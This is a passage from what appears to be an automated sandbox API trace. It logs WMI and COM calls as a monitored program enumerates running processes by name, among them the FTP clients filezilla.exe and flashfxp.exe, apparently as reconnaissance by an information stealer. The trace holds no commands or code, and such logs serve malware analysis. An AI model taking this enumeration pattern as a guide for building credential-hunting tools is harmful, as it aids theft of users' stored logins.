[4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0213.876] IUnknown:AddRef (This=0x560dca0) returned 0x3 [0213.876] IUnknown:QueryInterface (in: This=0x560dca0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0213.876] IUnknown:QueryInterface (in: This=0x560dca0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0213.877] IUnknown:QueryInterface (in: This=0x560dca0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x560dca4) returned 0x0 [0213.877] IMarshal:GetUnmarshalClass (in: This=0x560dca4, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0213.877] IUnknown:Release (This=0x560dca4) returned 0x3 [0213.877] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0213.877] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0213.877] IUnknown:QueryInterface (in: This=0x560dca0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0213.877] IUnknown:Release (This=0x560dca0) returned 0x2 [0213.877] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0213.877] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0213.877] IUnknown:QueryInterface (in: This=0x560dca0, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x560dca0) returned 0x0 [0213.877] IUnknown:AddRef (This=0x560dca0) returned 0x4 [0213.877] IUnknown:Release (This=0x560dca0) returned 0x3 [0213.877] IUnknown:Release (This=0x560dca0) returned 0x2 [0213.877] CoTaskMemFree (pv=0x561bde8) [0213.877] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0213.877] IUnknown:AddRef (This=0x560dca0) returned 0x3 [0213.877] IWbemClassObject:Get (in: This=0x560dca0, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0213.878] IWbemClassObject:Get (in: This=0x560dca0, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2872\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0213.878] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2872\"") returned 0x66 [0213.878] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2872\"") returned 0x66 [0213.878] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0213.878] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0213.878] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0213.878] IUnknown:Release (This=0x6d0cac) returned 0x1 [0213.879] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x561bde8) returned 0x0 [0213.879] WbemDefPath:IUnknown:QueryInterface (in: This=0x561bde8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0213.879] WbemDefPath:IClassFactory:CreateInstance (in: This=0x561bde8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x561a3c0) returned 0x0 [0213.879] WbemDefPath:IUnknown:Release (This=0x561bde8) returned 0x0 [0213.879] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a3c0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x561a3c0) returned 0x0 [0213.879] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a3c0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0213.879] WbemDefPath:IUnknown:AddRef (This=0x561a3c0) returned 0x3 [0213.879] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a3c0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0213.879] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a3c0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0213.879] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a3c0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x561bdf8) returned 0x0 [0213.879] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x561bdf8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0213.879] WbemDefPath:IUnknown:Release (This=0x561bdf8) returned 0x3 [0213.879] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0213.880] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0213.880] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a3c0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0213.880] WbemDefPath:IUnknown:Release (This=0x561a3c0) returned 0x2 [0213.880] WbemDefPath:IUnknown:Release (This=0x561a3c0) returned 0x1 [0213.880] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0213.880] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0213.880] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a3c0, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x561a3c0) returned 0x0 [0213.880] WbemDefPath:IUnknown:AddRef (This=0x561a3c0) returned 0x3 [0213.880] WbemDefPath:IUnknown:Release (This=0x561a3c0) returned 0x2 [0213.880] WbemDefPath:IWbemPath:SetText (This=0x561a3c0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2872\"") returned 0x0 [0213.880] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0213.880] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0213.880] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.880] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0213.880] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0213.880] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.880] IWbemClassObject:Get (in: This=0x560dca0, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26891dc*=0, plFlavor=0x26891e0*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="filezilla.exe", varVal2=0x0), pType=0x26891dc*=8, plFlavor=0x26891e0*=0) returned 0x0 [0213.880] SysStringByteLen (bstr="filezilla.exe") returned 0x1a [0213.880] SysStringByteLen (bstr="filezilla.exe") returned 0x1a [0213.880] IWbemClassObject:Get (in: This=0x560dca0, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26891dc*=8, plFlavor=0x26891e0*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="filezilla.exe", varVal2=0x0), pType=0x26891dc*=8, plFlavor=0x26891e0*=0) returned 0x0 [0213.880] SysStringByteLen (bstr="filezilla.exe") returned 0x1a [0213.880] SysStringByteLen (bstr="filezilla.exe") returned 0x1a [0213.881] CoTaskMemAlloc (cb=0x4) returned 0x561be28 [0213.881] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x561be28, puReturned=0x267acc0 | out: apObjects=0x561be28*=0x560de38, puReturned=0x267acc0*=0x1) returned 0x0 [0213.881] IUnknown:QueryInterface (in: This=0x560de38, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x560de38) returned 0x0 [0213.881] IUnknown:QueryInterface (in: This=0x560de38, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0213.881] IUnknown:QueryInterface (in: This=0x560de38, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0213.882] IUnknown:AddRef (This=0x560de38) returned 0x3 [0213.882] IUnknown:QueryInterface (in: This=0x560de38, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0213.882] IUnknown:QueryInterface (in: This=0x560de38, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0213.882] IUnknown:QueryInterface (in: This=0x560de38, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x560de3c) returned 0x0 [0213.882] IMarshal:GetUnmarshalClass (in: This=0x560de3c, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0213.882] IUnknown:Release (This=0x560de3c) returned 0x3 [0213.882] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0213.882] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0213.882] IUnknown:QueryInterface (in: This=0x560de38, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0213.882] IUnknown:Release (This=0x560de38) returned 0x2 [0213.882] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0213.882] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0213.882] IUnknown:QueryInterface (in: This=0x560de38, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x560de38) returned 0x0 [0213.882] IUnknown:AddRef (This=0x560de38) returned 0x4 [0213.882] IUnknown:Release (This=0x560de38) returned 0x3 [0213.882] IUnknown:Release (This=0x560de38) returned 0x2 [0213.882] CoTaskMemFree (pv=0x561be28) [0213.883] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0213.883] IUnknown:AddRef (This=0x560de38) returned 0x3 [0213.883] IWbemClassObject:Get (in: This=0x560de38, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0213.883] IWbemClassObject:Get (in: This=0x560de38, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2880\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0213.883] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2880\"") returned 0x66 [0213.883] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2880\"") returned 0x66 [0213.883] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0213.883] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0213.883] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0213.883] IUnknown:Release (This=0x6d0cac) returned 0x1 [0213.884] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x561be28) returned 0x0 [0213.884] WbemDefPath:IUnknown:QueryInterface (in: This=0x561be28, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0213.884] WbemDefPath:IClassFactory:CreateInstance (in: This=0x561be28, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x561a4a0) returned 0x0 [0213.884] WbemDefPath:IUnknown:Release (This=0x561be28) returned 0x0 [0213.884] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a4a0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x561a4a0) returned 0x0 [0213.884] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a4a0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0213.885] WbemDefPath:IUnknown:AddRef (This=0x561a4a0) returned 0x3 [0213.885] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a4a0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0213.885] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a4a0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0213.885] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a4a0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x561be38) returned 0x0 [0213.885] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x561be38, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0213.885] WbemDefPath:IUnknown:Release (This=0x561be38) returned 0x3 [0213.885] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0213.885] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0213.885] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a4a0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0213.885] WbemDefPath:IUnknown:Release (This=0x561a4a0) returned 0x2 [0213.885] WbemDefPath:IUnknown:Release (This=0x561a4a0) returned 0x1 [0213.885] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0213.885] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0213.885] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a4a0, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x561a4a0) returned 0x0 [0213.885] WbemDefPath:IUnknown:AddRef (This=0x561a4a0) returned 0x3 [0213.885] WbemDefPath:IUnknown:Release (This=0x561a4a0) returned 0x2 [0213.885] WbemDefPath:IWbemPath:SetText (This=0x561a4a0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2880\"") returned 0x0 [0213.885] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0213.885] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0213.885] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.885] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0213.885] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0213.885] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.886] IWbemClassObject:Get (in: This=0x560de38, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2689a50*=0, plFlavor=0x2689a54*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="flashfxp.exe", varVal2=0x0), pType=0x2689a50*=8, plFlavor=0x2689a54*=0) returned 0x0 [0213.886] SysStringByteLen (bstr="flashfxp.exe") returned 0x18 [0213.886] SysStringByteLen (bstr="flashfxp.exe") returned 0x18 [0213.886] IWbemClassObject:Get (in: This=0x560de38, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2689a50*=8, plFlavor=0x2689a54*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="flashfxp.exe", varVal2=0x0), pType=0x2689a50*=8, plFlavor=0x2689a54*=0) returned 0x0 [0213.886] SysStringByteLen (bstr="flashfxp.exe") returned 0x18 [0213.886] SysStringByteLen (bstr="flashfxp.exe") returned 0x18 [0213.886] CoTaskMemAlloc (cb=0x4) returned 0x561be68 [0213.886] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x561be68, puReturned=0x267acc0 | out: apObjects=0x561be68*=0x560dfd0, 